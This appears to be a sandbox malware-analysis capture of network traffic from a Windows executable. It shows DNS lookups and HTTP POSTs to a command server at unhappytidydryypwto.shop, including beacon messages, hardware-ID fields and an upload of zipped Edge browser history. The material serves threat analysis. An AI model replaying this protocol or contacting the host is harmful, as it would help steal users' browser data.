Jul 25, 2024 22:14:55.552835941 CEST | 443 | 49712 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:55.552977085 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:55.553006887 CEST | 443 | 49712 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:55.553178072 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:55.553205013 CEST | 443 | 49712 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:55.553215027 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:55.553226948 CEST | 443 | 49712 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:55.553359032 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:55.553385019 CEST | 443 | 49712 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:55.553406000 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:55.553484917 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:55.553513050 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:55.553525925 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:55.563524961 CEST | 443 | 49712 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:55.563695908 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:55.563728094 CEST | 443 | 49712 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:55.563731909 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:55.563750982 CEST | 443 | 49712 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:55.563769102 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:55.563797951 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:55.563815117 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Jul 25, 2024 22:14:55.566724062 CEST | 443 | 49712 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:57.114037037 CEST | 443 | 49712 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:57.114290953 CEST | 443 | 49712 | 104.21.48.252 | 192.168.2.9
Jul 25, 2024 22:14:57.114371061 CEST | 49712 | 443 | 192.168.2.9 | 104.21.48.252
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 25, 2024 22:14:44.163830042 CEST | 54364 | 53 | 192.168.2.9 | 1.1.1.1
Jul 25, 2024 22:14:44.181106091 CEST | 53 | 54364 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 25, 2024 22:14:44.163830042 CEST | 192.168.2.9 | 1.1.1.1 | 0xa315 | Standard query (0) | unhappytidydryypwto.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 25, 2024 22:14:44.181106091 CEST | 1.1.1.1 | 192.168.2.9 | 0xa315 | No error (0) | unhappytidydryypwto.shop | | 104.21.48.252 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 22:14:44.181106091 CEST | 1.1.1.1 | 192.168.2.9 | 0xa315 | No error (0) | unhappytidydryypwto.shop | | 172.67.157.26 | A (IP address) | IN (0x0001) | false
                  • unhappytidydryypwto.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49706 | 104.21.48.252 | 443 | 6236 | C:\Users\user\Desktop\LisectAVT_2403002A_236.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-25 20:14:45 UTC | 271 | OUT | POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 8
                  Host: unhappytidydryypwto.shop
2024-07-25 20:14:45 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                  Data Ascii: act=life
2024-07-25 20:14:45 UTC | 812 | IN | HTTP/1.1 200 OK
                  Date: Thu, 25 Jul 2024 20:14:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Set-Cookie: PHPSESSID=m3tbpk3sd5o4odbpudbtfj0lj9; expires=Mon, 18-Nov-2024 14:01:24 GMT; Max-Age=9999999; path=/
                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                  Cache-Control: no-store, no-cache, must-revalidate
                  Pragma: no-cache
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hQFeogVpxQcLlz0dI7VVyifDJ1%2BDxVfa2qIiRncGCqxq6gI9DksVOC09bPnmW1K%2BMa4DGC9WOhMavtxcl4ZaewFq%2BMzEH5doe1k6A1SDF0J9N4uVXDFCj0jnR%2F2ZJnJF3Qm7PE9nbbtxZsE%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a8ed16bfb528c29-EWR
                  alt-svc: h3=":443"; ma=86400
2024-07-25 20:14:45 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                  Data Ascii: 2ok
2024-07-25 20:14:45 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49707 | 104.21.48.252 | 443 | 6236 | C:\Users\user\Desktop\LisectAVT_2403002A_236.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-25 20:14:46 UTC | 272 | OUT | POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 49
                  Host: unhappytidydryypwto.shop
2024-07-25 20:14:46 UTC | 49 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 47 6a 4b 73 42 32 2d 2d 26 6a 3d 64 65 66 61 75 6c 74
                  Data Ascii: act=recive_message&ver=4.0&lid=GjKsB2--&j=default
2024-07-25 20:14:47 UTC | 806 | IN | HTTP/1.1 200 OK
                  Date: Thu, 25 Jul 2024 20:14:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Set-Cookie: PHPSESSID=qenqabfa0res9ohq90ct4tv40o; expires=Mon, 18-Nov-2024 14:01:25 GMT; Max-Age=9999999; path=/
                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                  Cache-Control: no-store, no-cache, must-revalidate
                  Pragma: no-cache
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=drE451zfPLcRfdcH7gQDYTQkx5UzHrZmO3yEXd12qVV5%2F76290xrIAGsMUNQyi4WIuXQqXyuCFHkMh8ZYiySKN5mZCRaLmolkxPgAV606tGXUGTjzfW2iLV0xYFevD17jcfH6zg8Jx1Tjvw%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a8ed1755af341ac-EWR
                  alt-svc: h3=":443"; ma=86400
2024-07-25 20:14:47 UTC | 563 | IN | Data Raw: 31 64 62 35 0d 0a 42 55 6d 34 6d 34 70 6a 73 4c 70 63 58 6c 57 2f 57 61 63 6d 48 74 64 4d 38 4f 4d 67 50 32 4a 38 66 67 4b 30 67 4c 4e 37 63 6e 5a 2b 61 38 36 35 73 46 65 63 6d 43 38 37 64 34 55 74 31 56 4e 37 2b 32 36 52 68 77 49 46 42 42 30 53 63 64 47 73 6b 51 30 66 56 44 38 76 32 66 66 35 42 70 79 59 4f 53 5a 33 68 51 4c 63 42 48 75 35 62 73 72 42 52 56 55 41 48 52 4a 67 31 65 76 63 43 78 34 56 62 53 58 66 38 2b 38 41 31 4e 73 77 4d 7a 44 61 50 4d 5a 4d 63 4c 34 68 6d 49 34 43 45 30 41 5a 42 43 43 4f 6f 76 34 65 42 68 64 49 4b 4d 76 77 71 42 36 63 77 58 34 37 4f 35 31 6a 68 55 64 37 74 53 43 57 68 30 74 58 43 68 51 61 59 64 44 71 77 78 49 55 48 6d 30 72 33 50 4c 6c 43 63 44 57 4f 6a 51 37 33 44 62 47 42 44 4c 31 4b 59 72 42 47 68 31 54 4c 42 39 78 78
                  Data Ascii: 1db5BUm4m4pjsLpcXlW/WacmHtdM8OMgP2J8fgK0gLN7cnZ+a865sFecmC87d4Ut1VN7+26RhwIFBB0ScdGskQ0fVD8v2ff5BpyYOSZ3hQLcBHu5bsrBRVUAHRJg1evcCx4VbSXf8+8A1NswMzDaPMZMcL4hmI4CE0AZBCCOov4eBhdIKMvwqB6cwX47O51jhUd7tSCWh0tXChQaYdDqwxIUHm0r3PLlCcDWOjQ73DbGBDL1KYrBGh1TLB9xx
2024-07-25 20:14:47 UTC | 1369 | IN | Data Raw: 65 2f 36 35 67 2f 56 7a 6e 34 6a 65 63 52 37 77 6b 67 38 37 57 36 63 68 45 31 50 41 51 77 5a 62 73 54 75 31 42 38 64 46 32 6b 72 33 2f 37 6c 44 39 54 66 50 54 51 7a 33 44 58 4a 54 6e 2b 78 4c 64 4c 50 41 6c 6f 59 58 6b 51 67 35 2b 48 56 48 67 49 58 61 57 76 46 74 2f 46 42 31 64 52 2b 5a 48 66 58 50 63 68 4e 64 37 49 6d 6e 70 4e 4a 55 67 4d 58 47 32 62 63 34 64 6b 54 46 68 70 6d 4c 4e 2f 2b 2b 67 2f 5a 31 54 30 32 4d 5a 31 31 68 55 4e 6b 39 58 62 53 72 30 46 4d 46 69 77 66 63 63 65 69 7a 6c 63 4a 56 47 41 6e 6d 71 47 6f 43 4e 72 58 4d 7a 45 39 30 7a 37 49 54 58 32 30 49 35 53 4b 51 31 55 49 47 68 74 67 30 75 2f 65 46 78 41 61 62 79 37 65 38 2b 46 42 6e 4a 67 35 4a 48 65 46 65 2f 56 4a 63 4c 34 69 30 4c 52 42 55 77 34 5a 43 69 44 4a 72 4d 68 5a 46 78 67 6e
                  Data Ascii: e/65g/Vzn4jecR7wkg87W6chE1PAQwZbsTu1B8dF2kr3/7lD9TfPTQz3DXJTn+xLdLPAloYXkQg5+HVHgIXaWvFt/FB1dR+ZHfXPchNd7ImnpNJUgMXG2bc4dkTFhpmLN/++g/Z1T02MZ11hUNk9XbSr0FMFiwfcceizlcJVGAnmqGoCNrXMzE90z7ITX20I5SKQ1UIGhtg0u/eFxAaby7e8+FBnJg5JHeFe/VJcL4i0LRBUw4ZCiDJrMhZFxgn
2024-07-25 20:14:47 UTC | 1369 | IN | Data Raw: 4d 4c 33 39 77 35 50 58 65 54 65 38 4a 63 50 4f 31 75 70 4a 46 50 55 53 34 56 45 47 6d 57 2f 5a 38 41 55 42 4e 72 61 34 4b 35 37 41 33 61 30 6a 45 31 50 64 63 30 7a 45 52 30 76 43 65 52 67 55 35 62 41 52 49 51 62 64 50 68 31 42 51 56 46 47 73 73 33 66 69 6f 54 35 4c 66 4a 6e 78 76 6e 51 76 49 53 48 65 35 62 4b 65 43 54 46 4d 48 43 46 78 2f 6d 50 75 52 48 68 78 55 50 32 76 56 2b 4f 55 4c 32 64 59 79 50 54 66 5a 4f 4d 39 45 63 37 41 6f 6d 6f 68 43 54 77 63 52 48 57 48 64 36 64 77 58 46 52 56 69 4c 4a 71 33 71 41 62 4b 6d 47 5a 38 47 76 51 42 68 56 73 79 72 47 36 56 6a 51 49 46 51 42 6f 57 59 4e 76 6f 32 68 59 54 45 32 6b 72 31 2f 50 36 43 64 4c 59 4d 44 6f 32 30 54 37 45 53 48 2b 6e 49 70 53 4d 52 46 55 53 58 6c 49 67 30 66 71 52 51 56 41 30 62 43 66 5a 39
                  Data Ascii: ML39w5PXeTe8JcPO1upJFPUS4VEGmW/Z8AUBNra4K57A3a0jE1Pdc0zER0vCeRgU5bARIQbdPh1BQVFGss3fioT5LfJnxvnQvISHe5bKeCTFMHCFx/mPuRHhxUP2vV+OUL2dYyPTfZOM9Ec7AomohCTwcRHWHd6dwXFRViLJq3qAbKmGZ8GvQBhVsyrG6VjQIFQBoWYNvo2hYTE2kr1/P6CdLYMDo20T7ESH+nIpSMRFUSXlIg0fqRQVA0bCfZ9
2024-07-25 20:14:47 UTC | 1369 | IN | Data Raw: 52 4e 6a 6f 34 31 43 6e 47 53 48 4b 79 49 4a 36 50 54 31 63 44 45 31 77 75 6c 75 58 4a 57 55 68 55 53 79 7a 58 31 2b 4d 4e 31 5a 67 68 63 69 36 64 50 4d 6b 45 4a 50 55 69 6d 49 31 4c 58 51 6b 62 46 47 76 66 35 39 41 53 46 52 64 68 4a 74 58 77 2b 67 76 52 31 6a 30 77 4f 39 73 36 78 6c 5a 30 76 47 37 63 77 55 56 46 51 45 5a 63 51 64 6a 76 78 52 34 41 56 48 68 6c 77 37 6e 76 44 5a 4b 41 66 6a 38 32 30 6a 6a 45 53 58 71 38 4a 70 4b 48 52 31 49 4e 45 42 74 6e 31 75 2f 66 46 68 59 63 61 69 66 52 39 2b 45 48 30 74 6b 30 66 48 6d 64 50 4e 30 45 4a 50 55 65 6b 59 46 43 52 6b 41 42 55 6e 6d 57 35 64 31 5a 53 46 52 31 49 64 50 35 36 77 37 56 33 44 55 77 4d 74 67 30 78 6b 31 35 76 43 43 41 69 45 78 56 43 42 45 5a 61 39 62 76 32 78 55 51 46 79 64 6c 6d 76 37 77 51 59
                  Data Ascii: RNjo41CnGSHKyIJ6PT1cDE1wuluXJWUhUSyzX1+MN1Zghci6dPMkEJPUimI1LXQkbFGvf59ASFRdhJtXw+gvR1j0wO9s6xlZ0vG7cwUVFQEZcQdjvxR4AVHhlw7nvDZKAfj820jjESXq8JpKHR1INEBtn1u/fFhYcaifR9+EH0tk0fHmdPN0EJPUekYFCRkABUnmW5d1ZSFR1IdP56w7V3DUwMtg0xk15vCCAiExVCBEZa9bv2xUQFydlmv7wQY
                  2024-07-25 20:14:47 UTC1369INData Raw: 4f 64 73 70 77 30 74 31 74 69 32 62 68 6b 70 52 43 68 30 62 49 4a 69 69 31 67 46 51 54 43 63 49 7a 65 6e 6c 51 63 32 57 4a 33 77 77 30 58 75 64 42 48 53 34 4a 70 69 46 52 56 41 48 47 42 56 79 33 2b 66 66 47 52 51 66 61 43 33 65 2b 75 67 54 31 4e 77 32 50 7a 72 51 4e 63 5a 41 50 50 74 75 6c 5a 6b 43 42 55 41 73 45 57 37 4e 37 64 59 49 47 6c 52 34 5a 63 4f 35 37 77 32 53 67 48 34 34 4f 63 38 77 78 45 39 33 75 79 6d 64 68 45 68 64 44 78 6f 66 62 74 33 6a 30 68 45 64 47 57 6b 68 30 2f 44 76 44 64 62 66 66 6e 4a 33 32 69 4f 46 48 44 79 65 44 37 2b 74 52 55 64 41 41 56 4a 35 6c 75 58 64 57 55 68 55 61 79 4c 57 38 2b 4d 47 32 4e 59 33 4d 6a 7a 50 4b 63 5a 41 66 37 77 74 6c 59 68 4d 58 51 63 62 45 6d 66 58 36 64 55 54 45 78 49 6e 5a 5a 72 2b 38 45 47 4b 6d 42 49
                  Data Ascii: Odspw0t1ti2bhkpRCh0bIJii1gFQTCcIzenlQc2WJ3ww0XudBHS4JpiFRVAHGBVy3+ffGRQfaC3e+ugT1Nw2PzrQNcZAPPtulZkCBUAsEW7N7dYIGlR4ZcO57w2SgH44Oc8wxE93uymdhEhdDxofbt3j0hEdGWkh0/DvDdbffnJ32iOFHDyeD7+tRUdAAVJ5luXdWUhUayLW8+MG2NY3MjzPKcZAf7wtlYhMXQcbEmfX6dUTExInZZr+8EGKmBI
                  2024-07-25 20:14:47 UTC1369INData Raw: 4d 35 42 64 72 51 70 6d 6f 78 51 58 67 38 52 47 47 44 5a 35 4e 63 59 48 78 4a 67 49 74 76 78 37 30 47 63 6d 44 6b 6b 64 34 56 37 36 30 4e 2f 73 57 36 4e 7a 31 73 64 42 78 4a 63 4f 4a 62 69 32 78 4d 61 47 6d 63 73 79 50 2f 68 41 64 48 4b 50 54 6f 2f 32 7a 66 4a 53 58 53 38 4c 70 65 4b 54 31 59 4e 47 42 78 72 31 36 4b 66 57 52 63 4d 4a 33 4f 61 79 4f 55 50 31 74 59 39 4c 44 43 64 4a 49 74 64 50 4c 49 69 30 74 6b 43 55 67 6b 4d 47 32 58 65 36 39 45 58 47 52 31 67 4c 39 6e 34 37 41 33 64 30 54 30 30 4e 74 55 30 78 6b 52 33 76 53 53 54 6a 30 63 64 54 6c 34 62 65 4a 61 36 6b 54 59 54 45 57 77 71 6d 4e 37 75 42 74 36 59 49 58 49 75 6e 54 7a 4a 42 43 54 31 4c 5a 61 50 53 31 49 45 46 42 74 67 30 65 54 52 45 52 73 5a 62 44 6e 66 39 2b 30 41 30 74 6b 78 4d 44 66 50
                  Data Ascii: M5BdrQpmoxQXg8RGGDZ5NcYHxJgItvx70GcmDkkd4V760N/sW6Nz1sdBxJcOJbi2xMaGmcsyP/hAdHKPTo/2zfJSXS8LpeKT1YNGBxr16KfWRcMJ3OayOUP1tY9LDCdJItdPLIi0tkCUgkMG2Xe69EXGR1gL9n47A3d0T00NtU0xkR3vSSTj0cdTl4beJa6kTYTEWwqmN7uBt6YIXIunTzJBCT1LZaPS1IEFBtg0eTRERsZbDnf9+0A0tkxMDfP
                  2024-07-25 20:14:47 UTC205INData Raw: 2f 79 45 4b 79 76 52 56 73 46 47 51 77 69 2b 4f 6e 46 48 6c 42 61 4a 79 53 61 6f 64 46 42 6d 70 67 42 63 6e 66 46 65 35 30 45 53 62 59 67 6e 49 5a 55 54 45 30 77 47 32 62 54 35 63 46 62 50 68 39 7a 4c 4a 71 33 71 41 65 53 67 47 35 79 64 39 6b 71 68 52 77 73 35 33 58 48 30 68 55 4e 55 67 46 53 65 5a 62 30 6b 55 46 43 57 69 63 35 6d 71 47 6f 52 74 48 4b 4c 44 6f 30 79 7a 69 43 65 6b 4b 32 4f 4a 2b 4f 53 56 77 2b 49 44 4a 74 31 2b 48 66 57 79 45 43 61 6a 76 5a 2f 4f 38 2f 37 4e 59 35 4b 44 44 54 50 63 55 45 4d 76 55 68 30 74 6c 37 48 55 68 65 49 79 36 57 2b 70 46 42 55 43 46 6b 4a 64 54 2b 2f 68 43 66 2b 0d 0a
                  Data Ascii: /yEKyvRVsFGQwi+OnFHlBaJySaodFBmpgBcnfFe50ESbYgnIZUTE0wG2bT5cFbPh9zLJq3qAeSgG5yd9kqhRws53XH0hUNUgFSeZb0kUFCWic5mqGoRtHKLDo0yziCekK2OJ+OSVw+IDJt1+HfWyECajvZ/O8/7NY5KDDTPcUEMvUh0tl7HUheIy6W+pFBUCFkJdT+/hCf+
                  2024-07-25 20:14:47 UTC1369INData Raw: 32 34 36 62 0d 0a 79 67 78 4f 4e 59 36 68 51 6f 38 73 32 37 4b 30 51 77 64 42 41 39 63 4f 49 61 77 69 6b 78 44 51 7a 64 35 78 62 66 78 51 63 53 59 5a 6d 35 35 6e 53 6d 46 48 44 7a 79 49 4a 2b 41 51 56 4d 44 44 41 35 6d 31 66 54 53 58 69 34 71 52 69 62 52 39 65 55 4f 32 65 59 41 48 54 72 57 4e 38 68 4c 64 34 73 51 68 34 4a 4d 55 77 63 49 44 53 43 59 6f 74 35 5a 53 43 30 6e 59 35 72 47 70 6b 48 4b 6d 47 5a 38 41 74 34 31 79 30 4e 71 70 47 4f 7a 6a 45 6c 52 44 52 45 58 49 4a 69 69 31 31 6c 49 52 43 6c 72 33 75 69 6f 57 59 4b 4b 5a 57 6c 6b 69 6d 75 58 57 7a 4b 73 62 6f 54 42 47 67 39 4f 58 67 34 67 6a 71 4b 57 47 67 49 47 59 53 6a 4d 2b 71 38 2f 37 50 73 70 4b 6a 33 47 65 65 4e 44 62 62 77 34 6e 35 4e 38 59 79 34 54 48 57 50 59 6f 4f 41 50 48 51 52 6b 4c 74
                  Data Ascii: 246bygxONY6hQo8s27K0QwdBA9cOIawikxDQzd5xbfxQcSYZm55nSmFHDzyIJ+AQVMDDA5m1fTSXi4qRibR9eUO2eYAHTrWN8hLd4sQh4JMUwcIDSCYot5ZSC0nY5rGpkHKmGZ8At41y0NqpGOzjElRDREXIJii11lIRClr3uioWYKKZWlkimuXWzKsboTBGg9OXg4gjqKWGgIGYSjM+q8/7PspKj3GeeNDbbw4n5N8Yy4THWPYoOAPHQRkLt
                  2024-07-25 20:14:47 UTC1369INData Raw: 68 59 68 73 49 33 6e 45 65 39 4d 45 4a 4f 64 67 30 70 4d 43 42 55 42 5a 48 33 4c 45 35 4e 49 50 45 31 4e 5a 46 66 7a 36 2b 51 76 7a 31 53 34 37 43 65 4d 75 78 6b 70 79 73 6a 69 44 77 51 77 64 44 31 35 45 57 5a 61 71 6e 52 38 54 41 69 63 55 6c 4c 6e 77 51 59 71 59 43 7a 38 35 30 7a 7a 54 56 54 47 54 4c 59 4f 4c 59 31 41 51 47 56 77 75 6c 75 53 52 51 55 4e 61 4a 79 2f 4c 75 62 42 52 67 49 4e 72 62 32 43 4e 61 64 6f 4b 5a 66 55 34 30 74 6b 51 45 30 41 4d 58 44 69 57 70 64 49 4c 41 68 4a 6b 50 64 6d 2b 31 6a 2f 6e 32 7a 41 79 4d 4d 73 4f 78 6c 56 2f 74 53 57 73 76 32 4e 54 43 78 6b 51 64 75 6a 63 35 42 6f 65 47 6d 41 39 79 37 6d 6d 51 64 32 59 5a 67 56 33 6c 58 76 36 43 6a 79 74 62 73 72 42 64 31 34 4f 45 42 74 32 78 36 2f 6b 47 67 45 58 5a 79 43 61 74 36 67
                  Data Ascii: hYhsI3nEe9MEJOdg0pMCBUBZH3LE5NIPE1NZFfz6+Qvz1S47CeMuxkpysjiDwQwdD15EWZaqnR8TAicUlLnwQYqYCz850zzTVTGTLYOLY1AQGVwuluSRQUNaJy/LubBRgINrb2CNadoKZfU40tkQE0AMXDiWpdILAhJkPdm+1j/n2zAyMMsOxlV/tSWsv2NTCxkQdujc5BoeGmA9y7mmQd2YZgV3lXv6CjytbsrBd14OEBt2x6/kGgEXZyCat6g


                  Session ID: 2   Source IP: 192.168.2.9   Source Port: 49708   Destination IP: 104.21.48.25   Destination Port: 443   PID: 6236   Process: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe
                  Timestamp  Bytes transferred  Direction  Data
                  2024-07-25 20:14:47 UTC  290  OUT  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 13684
                  Host: unhappytidydryypwto.shop
                  2024-07-25 20:14:47 UTC13684OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 31 46 31 44 36 46 37 32 41 35 41 30 46 45 31 42 41 36 33 45 38 39 44 46 31 36 37 44 30 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 6a 4b 73 42 32 2d 2d 0d 0a 2d 2d 62
                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"031F1D6F72A5A0FE1BA63E89DF167D00--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GjKsB2----b
                  2024-07-25 20:14:48 UTC  812  IN  HTTP/1.1 200 OK
                  Date: Thu, 25 Jul 2024 20:14:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Set-Cookie: PHPSESSID=a9q97c0vp5ikhl6f9bodes0609; expires=Mon, 18-Nov-2024 14:01:26 GMT; Max-Age=9999999; path=/
                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                  Cache-Control: no-store, no-cache, must-revalidate
                  Pragma: no-cache
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mrO683YTusgDhQBR3Vp7fKpb3b%2BYQjbsgNBrr0s%2FD4mGmEn78cJgW1Nobf%2FSpujom2Rw96ETBR85tjnts2sxfxDsRkN9saUt4rzJmlnnxyKMoxaSmTkp%2Fm2I0oWidpxZPNVZV3iXUV33oZk%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a8ed17c795d41a1-EWR
                  alt-svc: h3=":443"; ma=86400
                  2024-07-25 20:14:48 UTC  19  IN  Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                  Data Ascii: eok 8.46.123.33
                  2024-07-25 20:14:48 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session ID: 3   Source IP: 192.168.2.9   Source Port: 49709   Destination IP: 104.21.48.25   Destination Port: 443   PID: 6236   Process: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe
                  Timestamp  Bytes transferred  Direction  Data
                  2024-07-25 20:14:48 UTC  290  OUT  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 16199
                  Host: unhappytidydryypwto.shop
                  2024-07-25 20:14:48 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 31 46 31 44 36 46 37 32 41 35 41 30 46 45 31 42 41 36 33 45 38 39 44 46 31 36 37 44 30 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 6a 4b 73 42 32 2d 2d 0d 0a 2d 2d 62
                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"031F1D6F72A5A0FE1BA63E89DF167D00--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GjKsB2----b
                  2024-07-25 20:14:48 UTC868OUTData Raw: 6f 6d 70 61 72 61 74 6f 72 02 00 03 02 04 00 50 4b 07 08 a0 1c 50 7b 2e 00 00 00 29 00 00 00 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 18 4d 89 51 12 00 00 00 0d 00 00 00 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 64 67 65 2f 42 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 2e 74 78 74 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 8d f5 3d f7 25 00 00 00 20 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 57 00 00 00 45 64 67 65 2f 64 70 2e 74 78 74 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 7f 06 10 18 41 0b 00 00 00 60 02 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 b5 00 00 00 45 64 67 65 2f 44 65 66 61 75 6c 74 2f 48 69 73 74 6f 72 79 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 e5 a5 64 a8 3b 07 00 00 00 c8 00 00 17 00 00 00
